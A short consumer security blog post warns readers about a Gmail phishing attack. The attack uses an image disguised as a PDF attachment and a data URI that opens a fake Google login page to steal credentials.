Watch out for this sneaky Gmail attack

Wordfence have highlighted a particularly sneaky Gmail phishing attack. Here’s what to look out for …

You receive an email – possibly from a friend or a legitimate contact – with an attachment, like this:

Although it looks genuine, it’s NOT a real attachment. It’s actually an embedded image crafted to look like a PDF, and when you click it, the embedded link in the image takes you to a fake Google login page …

… that also looks like the real thing. The only clue is in the browser’s address bar:

But that looks genuine too, doesn’t it? It says https://accounts.google.com, etc. The only oddity is that  data:text/html preface. And that’s the gotcha. It’s actually what’s known as a ‘data URI’ and what it’s telling the browser is that what follows isn’t a web address but a string of text, in this case a particularly long one. After a lot of whitespace to push what follows off the screen, you’ll find this …

… the start of a script that opens in a new tab and creates a functional but fake Gmail login page. A page that sends your user name and password to the attacker.

According to a comment on Hacker News,

“The attackers log in to your account immediately once they get the credentials, and they use one of your actual attachments, along with one of your actual subject lines, and send it to people in your contact list.”

Share this ...
Share on FacebookTweet about this on TwitterPin on PinterestShare on Google+Share on TumblrShare on LinkedInDigg thisShare on RedditShare on StumbleUponEmail this to someonePrint this page

Leave a Reply

Your email address will not be published. Required fields are marked *